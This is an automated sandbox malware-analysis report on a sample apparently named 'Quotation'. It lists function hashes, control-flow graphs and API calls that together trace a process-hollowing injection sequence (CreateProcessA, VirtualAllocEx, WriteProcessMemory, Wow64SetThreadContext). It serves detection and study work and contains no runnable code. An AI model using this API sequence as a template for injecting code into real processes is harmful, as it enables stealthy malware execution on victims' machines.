                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5fe552d361357bff7f2a7e817e499bd4c6d4a1432dee05deb4ef9b2a8f4c9523
                                          • Instruction ID: 9fb5ea799c04cedb1db9cd9f185a12ef4fec2c41243634d31a7e92484a256d99
                                          • Opcode Fuzzy Hash: 5fe552d361357bff7f2a7e817e499bd4c6d4a1432dee05deb4ef9b2a8f4c9523
                                          • Instruction Fuzzy Hash: 3E412F30A00248CFD754DF69D999AAD77F6BB9A304F1080AAD806EF3A4DB70AD41CF04
                                          Function 05866BF9 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bacb00bb4a83b215cc7cf90cb8d1746c8d7ddb74d82c2f8ce12be888e092d23f
                                          • Instruction ID: 404b5e2075ccf0c2fb7dfbe777127a9f10a58674034696f23f949ca9c1e4b4e3
                                          • Opcode Fuzzy Hash: bacb00bb4a83b215cc7cf90cb8d1746c8d7ddb74d82c2f8ce12be888e092d23f
                                          • Instruction Fuzzy Hash: 77412C34A10218CFDB64DF29D999BA977F6AF9A304F5081A99809EB394DB70AD44CF00
                                          Function 05866F35 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0befc285b158683c6c12aca3006fbb877effb2e86682ee7e3639855d558ccf48
                                          • Instruction ID: 4063b6d59fd470379dcc52fb082fae728695dbccce80ea4f83e921e69fc72d44
                                          • Opcode Fuzzy Hash: 0befc285b158683c6c12aca3006fbb877effb2e86682ee7e3639855d558ccf48
                                          • Instruction Fuzzy Hash: 6A413030A00258CFD764DF69D999BE977F1AB9A304F4080A9D809EF3A4DB709D84CF04
                                          Function 05866766 Relevance: .1, Instructions: 85COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ad876361696b0ffa2c4f8aa434825337b3283d0aa18866d6aa3548a5cda73655
                                          • Instruction ID: 8d33c003fcae366de8bf7ef8dbed1efa388e028aae6aba95675953c66767f9d0
                                          • Opcode Fuzzy Hash: ad876361696b0ffa2c4f8aa434825337b3283d0aa18866d6aa3548a5cda73655
                                          • Instruction Fuzzy Hash: 11412F30A10254CFDB64DF29D999BE977F6BB9A304F4090AAD809EB394DB70AD41CF40
                                          Function 058666B9 Relevance: .1, Instructions: 85COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a40f129b7753b6b685ecebcb986ad0c972ccb693178647bafa0fb323441d2aea
                                          • Instruction ID: 96aae309230e1c306bfc10166aefaf2f2a2a3b390bb006d67675b44551684c29
                                          • Opcode Fuzzy Hash: a40f129b7753b6b685ecebcb986ad0c972ccb693178647bafa0fb323441d2aea
                                          • Instruction Fuzzy Hash: E2411134A00218CFD764DF29D999BE977F5AF9A304F4081A9D80AEB394DB709D41CF44
                                          Function 05866A29 Relevance: .1, Instructions: 85COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 142d8eb25bc56a9a11994d5542da9b5b8e3f05f49ed8c78e34902324d69fd23b
                                          • Instruction ID: e69138ef66e95778ae4d8b9c334b9b668fef55d97c980cfbcc239fab38febec6
                                          • Opcode Fuzzy Hash: 142d8eb25bc56a9a11994d5542da9b5b8e3f05f49ed8c78e34902324d69fd23b
                                          • Instruction Fuzzy Hash: CF414130A00258CFD764DF29D999BED77F5AB9A304F1081AAD809EB3A4DB70AD41CF44
                                          Function 058693B7 Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 64ee6f6b770bb0ef80c965c66259c254a40f1989fb60c274d7c468a3ab4b24b5
                                          • Instruction ID: 508b9b875cdde84c4b86a2bbc2fb8fbca4e50025ba069acb27fbd6db2f95b4e3
                                          • Opcode Fuzzy Hash: 64ee6f6b770bb0ef80c965c66259c254a40f1989fb60c274d7c468a3ab4b24b5
                                          • Instruction Fuzzy Hash: 0021F7B1D08618DBDB18CF9AD94079DFBF7AF89304F14C1AAD809AA295DB300A46CF50
                                          Function 058D94B2 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 58d94b2-58d94b6 1 58d94bc-58d94de 0->1 2 58d936a-58d93a6 0->2 3 58d8aaa-58d8ab3 1->3 4 58d94e4-58d94ef 1->4 33 58d93ac call 58db549 2->33 34 58d93ac call 58db558 2->34 5 58d8abc-58d9b75 3->5 6 58d8ab5 3->6 4->3 5->3 29 58d9b7b-58d9b86 5->29 8 58d89cc-58d89cd 6->8 9 58d8a5e-58d8a6a 6->9 10 58d89e1-58d8a13 6->10 11 58d8df3-58d8dfa 6->11 8->10 15 58d899d-58d89a6 9->15 10->15 16 58d8a15-58d8a20 10->16 13 58d91c7-58d91ee 11->13 14 58d8e00-58d8e0b 11->14 13->3 28 58d91f4-58d91ff 13->28 14->3 19 58d89af-58d89b0 15->19 20 58d89a8 15->20 16->15 17 58d93b2-58d93cc 26 58d89b2-58d89c0 19->26 23 58d89cf-58d89df 20->23 24 58d8a6f-58d8aa4 20->24 25 58d8a25-58d8a48 20->25 20->26 27 58d89c2-58d89c9 20->27 23->15 24->3 25->15 30 58d8a4e-58d8a59 25->30 26->15 28->3 29->3 30->15 33->17 34->17
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: &$=
                                          • API String ID: 0-1778470647
                                          • Opcode ID: d185c56cf4f992f2f3b0ddcb460e33ec4022bfc9a8a6a712dfd27ffb0f241ab6
                                          • Instruction ID: 74a6d02a463faab9a7491d62d2c2cca7142ade6e5e986048b7a9023016119bc4
                                          • Opcode Fuzzy Hash: d185c56cf4f992f2f3b0ddcb460e33ec4022bfc9a8a6a712dfd27ffb0f241ab6
                                          • Instruction Fuzzy Hash: 2041AC70909268CFDB60CF59D988BE9BBF2AB49305F10A0EAD909B7244D7745EC4CF25
                                          Function 05780E6A Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 55 5780e6a-5780e85 57 578106a 55->57 58 5780e8b-5780e93 55->58 60 5781076-57810bd 57->60 59 578011f-5780127 58->59 61 5780129-57802a6 59->61 62 5780130-57818a6 59->62 73 5781b98-5781c12 60->73 74 57810c3-57810cb 60->74 61->59 79 57802ac-57802b4 61->79 62->59 71 57818ac-57818b4 62->71 71->59 73->59 82 5781c18-5781c20 73->82 74->59 79->59 82->59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$U
                                          • API String ID: 0-1697779727
                                          • Opcode ID: 9eeba0b41f36e9179b21a30da7857cef632a8fc46cd5b12cab4f7e9a5d10f769
                                          • Instruction ID: f566787d9953ff96f6105a13d9105160687bcec0b0497016ceedddb2140699d1
                                          • Opcode Fuzzy Hash: 9eeba0b41f36e9179b21a30da7857cef632a8fc46cd5b12cab4f7e9a5d10f769
                                          • Instruction Fuzzy Hash: 46319D74A15228CFDB64EF20D889BAEBBB2BB49310F5051E9D409A7260CB746EC5DF41
                                          Function 058D9609 Relevance: 2.5, Strings: 2, Instructions: 25COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 83 58d9609-58d960d 84 58d936a-58d93a6 83->84 85 58d9613-58d9614 83->85 88 58d93ac call 58db549 84->88 89 58d93ac call 58db558 84->89 87 58d93b2-58d93cc 88->87 89->87
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: =$A
                                          • API String ID: 0-599867249
                                          • Opcode ID: 48f8507ad9f483b2016a9be2742092289eafd009487f9ef68dac185859620523
                                          • Instruction ID: 562d3a1ccb92da698e0fb3e283cd4d62f3ba558f2bf025b1e033c5e75b42c6fa
                                          • Opcode Fuzzy Hash: 48f8507ad9f483b2016a9be2742092289eafd009487f9ef68dac185859620523
                                          • Instruction Fuzzy Hash: B0F05B74906668CFDB60CF64DD48BDDBBB1AB49309F10409ADA09BA384CA745EC4CF40
                                          Function 0586D505 Relevance: 1.8, APIs: 1, Instructions: 263processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 477 586d505-586d5a2 479 586d5a4-586d5bb 477->479 480 586d5eb-586d613 477->480 479->480 483 586d5bd-586d5c2 479->483 484 586d615-586d629 480->484 485 586d659-586d6af 480->485 486 586d5c4-586d5ce 483->486 487 586d5e5-586d5e8 483->487 484->485 495 586d62b-586d630 484->495 493 586d6f5-586d78a CreateProcessA 485->493 494 586d6b1-586d6c5 485->494 488 586d5d2-586d5e1 486->488 489 586d5d0 486->489 487->480 488->488 492 586d5e3 488->492 489->488 492->487 507 586d793-586d809 493->507 508 586d78c-586d792 493->508 494->493 503 586d6c7-586d6cc 494->503 496 586d632-586d63c 495->496 497 586d653-586d656 495->497 500 586d640-586d64f 496->500 501 586d63e 496->501 497->485 500->500 502 586d651 500->502 501->500 502->497 505 586d6ce-586d6d8 503->505 506 586d6ef-586d6f2 503->506 509 586d6dc-586d6eb 505->509 510 586d6da 505->510 506->493 516 586d80b-586d80f 507->516 517 586d819-586d81d 507->517 508->507 509->509 511 586d6ed 509->511 510->509 511->506 516->517 520 586d811 516->520 518 586d81f-586d823 517->518 519 586d82d-586d831 517->519 518->519 521 586d825 518->521 522 586d833-586d837 519->522 523 586d841 519->523 520->517 521->519 522->523 524 586d839 522->524 525 586d842 523->525 524->523 525->525
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0586D777
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6e041b2fcdb4eac8b3b03f89276f01b4fcb3e65ff21413bbf06647dda67e6ca5
                                          • Instruction ID: 9f209463f45ff7e0bf0e9d4008a6a4d6b7e4936832bcca7d9500ceb725178734
                                          • Opcode Fuzzy Hash: 6e041b2fcdb4eac8b3b03f89276f01b4fcb3e65ff21413bbf06647dda67e6ca5
                                          • Instruction Fuzzy Hash: C8A111B0E01219CFDB20CFA9D885BEDBBB1BF49304F10916AE859E7240DB748985CF95
                                          Function 0586D510 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 526 586d510-586d5a2 528 586d5a4-586d5bb 526->528 529 586d5eb-586d613 526->529 528->529 532 586d5bd-586d5c2 528->532 533 586d615-586d629 529->533 534 586d659-586d6af 529->534 535 586d5c4-586d5ce 532->535 536 586d5e5-586d5e8 532->536 533->534 544 586d62b-586d630 533->544 542 586d6f5-586d78a CreateProcessA 534->542 543 586d6b1-586d6c5 534->543 537 586d5d2-586d5e1 535->537 538 586d5d0 535->538 536->529 537->537 541 586d5e3 537->541 538->537 541->536 556 586d793-586d809 542->556 557 586d78c-586d792 542->557 543->542 552 586d6c7-586d6cc 543->552 545 586d632-586d63c 544->545 546 586d653-586d656 544->546 549 586d640-586d64f 545->549 550 586d63e 545->550 546->534 549->549 551 586d651 549->551 550->549 551->546 554 586d6ce-586d6d8 552->554 555 586d6ef-586d6f2 552->555 558 586d6dc-586d6eb 554->558 559 586d6da 554->559 555->542 565 586d80b-586d80f 556->565 566 586d819-586d81d 556->566 557->556 558->558 560 586d6ed 558->560 559->558 560->555 565->566 569 586d811 565->569 567 586d81f-586d823 566->567 568 586d82d-586d831 566->568 567->568 570 586d825 567->570 571 586d833-586d837 568->571 572 586d841 568->572 569->566 570->568 571->572 573 586d839 571->573 574 586d842 572->574 573->572 574->574
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0586D777
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 065a77bd87ae8e9777967a92702af13cda2b03078c509b885026998f434454ad
                                          • Instruction ID: 5609d5dcd554a0379b49ee91739f6df16540c4074b86ef937ecf722aa3e7b193
                                          • Opcode Fuzzy Hash: 065a77bd87ae8e9777967a92702af13cda2b03078c509b885026998f434454ad
                                          • Instruction Fuzzy Hash: CBA1F170E01219CFDB20CFA9D885BEEBBB1BF49304F10956AE859E7240DB748985CF95
                                          Function 0586DF83 Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 864 586df83-586dff3 867 586dff5-586e007 864->867 868 586e00a-586e06b WriteProcessMemory 864->868 867->868 870 586e074-586e0c6 868->870 871 586e06d-586e073 868->871 871->870
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0586E05B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: f6144fd82ff719fe9a09efea034fab1d0569f52ce7ffb2ab299842c2f393a472
                                          • Instruction ID: d1f673f75748f086364bef19fb55cd7b7a5607df9d2d363b2f065b63a6f2925f
                                          • Opcode Fuzzy Hash: f6144fd82ff719fe9a09efea034fab1d0569f52ce7ffb2ab299842c2f393a472
                                          • Instruction Fuzzy Hash: 2141A9B5D012589FDF00CFA9D984ADEFBF1BB49310F24902AE918B7200C739AA45CF64
                                          Function 0586DF88 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 876 586df88-586dff3 878 586dff5-586e007 876->878 879 586e00a-586e06b WriteProcessMemory 876->879 878->879 881 586e074-586e0c6 879->881 882 586e06d-586e073 879->882 882->881
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0586E05B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: a42d2e40c32e445065056c5640bf817eacef5b7b61f8e9a790c3a6a06230b813
                                          • Instruction ID: 1f9d3fd777ccc7962e0303a7d3279494883f724a965ff43e625a830b696d4caa
                                          • Opcode Fuzzy Hash: a42d2e40c32e445065056c5640bf817eacef5b7b61f8e9a790c3a6a06230b813
                                          • Instruction Fuzzy Hash: 5341A9B5D012589FDF00CFA9D984ADEFBF1BB49310F20902AE818B7200C739AA45CF64
                                          Function 0586DE28 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 906 586de28-586dee2 VirtualAllocEx 909 586dee4-586deea 906->909 910 586deeb-586df35 906->910 909->910
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0586DED2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: dc8080cd86c349767e6f5451bb629726e5b6dfe171b09ac92e294fcc2451df5e
                                          • Instruction ID: 88313d660287516b2d608a5fa78848926f717e85e280b9bb44be3532d5fe36a2
                                          • Opcode Fuzzy Hash: dc8080cd86c349767e6f5451bb629726e5b6dfe171b09ac92e294fcc2451df5e
                                          • Instruction Fuzzy Hash: 693197B9D05258DFCF10CFA9D981A9EFBB1BB59310F10A42AE815B7210D735A905CF68
                                          Function 0586DE21 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 915 586de21-586dee2 VirtualAllocEx 918 586dee4-586deea 915->918 919 586deeb-586df35 915->919 918->919
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0586DED2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 378a7d9acc1874464e3b6e8c49432f80dba8638c5d293638150d74fceebf6fc9
                                          • Instruction ID: 0ea299cb7e06c5e08808de6f56452bb5a4bc4eff55472ba21ac65df540c2e4f2
                                          • Opcode Fuzzy Hash: 378a7d9acc1874464e3b6e8c49432f80dba8638c5d293638150d74fceebf6fc9
                                          • Instruction Fuzzy Hash: 0C31A8B9D01248DFCF10CFA9E981A9EBBB1BF09310F10941AE815B7210C735A901CF64
                                          Function 0593D730 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 924 593d730-593d7e4 VirtualProtect 927 593d7e6-593d7ec 924->927 928 593d7ed-593d835 924->928 927->928
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0593D7D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254869468.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5930000_Quotation.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 5fd8a638ecb4e1ca7f95e34df4b983b99023ba46dc752c86583071960977bdd2
                                          • Instruction ID: dd36c6c8816a7d86a227723ecfbf77d757b0f98588b9a36b76b7b3966f5a7f24
                                          • Opcode Fuzzy Hash: 5fd8a638ecb4e1ca7f95e34df4b983b99023ba46dc752c86583071960977bdd2
                                          • Instruction Fuzzy Hash: 6A31A6B8D01248DFDF10CFA9D981A9EFBB1BF49310F24942AE815B7210D735A9458FA8
                                          Function 05847040 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 933 5847040-5847052 934 5847054-5847075 933->934 935 584707c-5847080 933->935 934->935 936 5847082-5847084 935->936 937 584708c-584709b 935->937 936->937 938 58470a7-58470d3 937->938 939 584709d 937->939 943 5847300-5847347 938->943 944 58470d9-58470df 938->944 939->938 973 584735d-5847369 943->973 974 5847349 943->974 946 58470e5-58470eb 944->946 947 58471b1-58471b5 944->947 946->943 951 58470f1-58470fe 946->951 948 58471b7-58471c0 947->948 949 58471d8-58471e1 947->949 948->943 954 58471c6-58471d6 948->954 955 5847206-5847209 949->955 956 58471e3-5847203 949->956 952 5847104-584710d 951->952 953 5847190-5847199 951->953 952->943 957 5847113-584712b 952->957 953->943 958 584719f-58471ab 953->958 959 584720c-5847212 954->959 955->959 956->955 962 5847137-5847149 957->962 963 584712d 957->963 958->946 958->947 959->943 961 5847218-584722b 959->961 961->943 965 5847231-5847241 961->965 962->953 972 584714b-5847151 962->972 963->962 965->943 967 5847247-5847254 965->967 967->943 971 584725a-584726f 967->971 971->943 984 5847275-5847298 971->984 975 5847153 972->975 976 584715d-5847163 972->976 979 5847375-5847391 973->979 980 584736b 973->980 977 584734c-584734e 974->977 975->976 976->943 981 5847169-584718d 976->981 982 5847350-584735b 977->982 983 5847392-58473bf call 58427e0 977->983 980->979 982->973 982->977 995 58473d7-58473d9 983->995 996 58473c1-58473c7 983->996 984->943 990 584729a-58472a5 984->990 993 58472f6-58472fd 990->993 994 58472a7-58472b1 990->994 994->993 1001 58472b3-58472c9 994->1001 1019 58473db call 58485ff 995->1019 1020 58473db call 5847448 995->1020 1021 58473db call 5847458 995->1021 997 58473c9 996->997 998 58473cb-58473cd 996->998 997->995 998->995 1000 58473e1-58473e5 1002 58473e7-58473fe 1000->1002 1003 5847430-5847440 1000->1003 1005 58472d5-58472ee 1001->1005 1006 58472cb 1001->1006 1002->1003 1011 5847400-584740a 1002->1011 1005->993 1006->1005 1014 584740c-584741b 1011->1014 1015 584741d-584742d 1011->1015 1014->1015 1019->1000 1020->1000 1021->1000
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: 6fa37a43b6a293d29f975ed4f59675074f06c0ae6209153e877af67b6155f142
                                          • Instruction ID: d1f95c84d746385e2a187a96608f985ee874cb3f87c5fabeabad4c07512398b5
                                          • Opcode Fuzzy Hash: 6fa37a43b6a293d29f975ed4f59675074f06c0ae6209153e877af67b6155f142
                                          • Instruction Fuzzy Hash: DCD1123060061A8FCB15DF68C484A6AB7F2FF88314B558969DD5ACB665EB30FC46CF90
                                          Function 0586D8C0 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0586D977
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: fca7414ca6fce0fce9e99d07b2d46896ad3f5ba2e6c6dd647c4e05cc4472a328
                                          • Instruction ID: 7b76cff49a6fc2912fa36889fb5097a7a91bdab9e507032b24481f72638e7823
                                          • Opcode Fuzzy Hash: fca7414ca6fce0fce9e99d07b2d46896ad3f5ba2e6c6dd647c4e05cc4472a328
                                          • Instruction Fuzzy Hash: 0141CBB5D01259DFDB10CFAAD884AEEBBF1BF49310F14802AE819B7240D7386945CF54
                                          Function 0586D8C8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0586D977
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 8ecb5d6e93d69899ddd96647bb42e6c5b21907c3ff16ad7e6c0364f74f1c3715
                                          • Instruction ID: 586b05a41fd33554c3266be42c67385cd6afa2b3cb40c64199ff332d90d96b31
                                          • Opcode Fuzzy Hash: 8ecb5d6e93d69899ddd96647bb42e6c5b21907c3ff16ad7e6c0364f74f1c3715
                                          • Instruction Fuzzy Hash: 0D319AB5D01258DFDB14CFAAD985AEEBBF1BF49310F24802AE419B7240D738A945CF64
                                          Function 05869BF0 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 9e46f66849f8661b2c613aafb280b9dd5c1c5bd19da2f882e030e9e480b502fd
                                          • Instruction ID: 44988718e16ada94c8f4a84599f2fdb2ecb017a0d87d681892bb807bea52399c
                                          • Opcode Fuzzy Hash: 9e46f66849f8661b2c613aafb280b9dd5c1c5bd19da2f882e030e9e480b502fd
                                          • Instruction Fuzzy Hash: D531DBB5D052589FDF10CFAAD980AAEFBF5AB49310F14842AE814B7240C739A905CFA4
                                          Function 05869BF8 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 1b8437e1083d026563d3989922646fa035ae206edbd2daec32fca118a80b1c2d
                                          • Instruction ID: 0eed4fc95cb7db552b19352dcc1920ffb3450b95bcd8a9272526c4d7b5d80759
                                          • Opcode Fuzzy Hash: 1b8437e1083d026563d3989922646fa035ae206edbd2daec32fca118a80b1c2d
                                          • Instruction Fuzzy Hash: 7231B7B5D012589FDF10CFAAD980AAEBBF5AB49310F14942AE814B7240C739A945CBA4
                                          Function 058D979D Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: a8bfa2888455ed03197a7c2d6643af570918765d86e9fa0141c08114ccf2b275
                                          • Instruction ID: 29884eef0f09db55bcae41c981137ee2d3c31848594efb15b402bdb97e94ad20
                                          • Opcode Fuzzy Hash: a8bfa2888455ed03197a7c2d6643af570918765d86e9fa0141c08114ccf2b275
                                          • Instruction Fuzzy Hash: C2519D74905268CFDB60CF59C888BE9BBF2AB49304F10A0EAD909B7244DB745EC5CF25
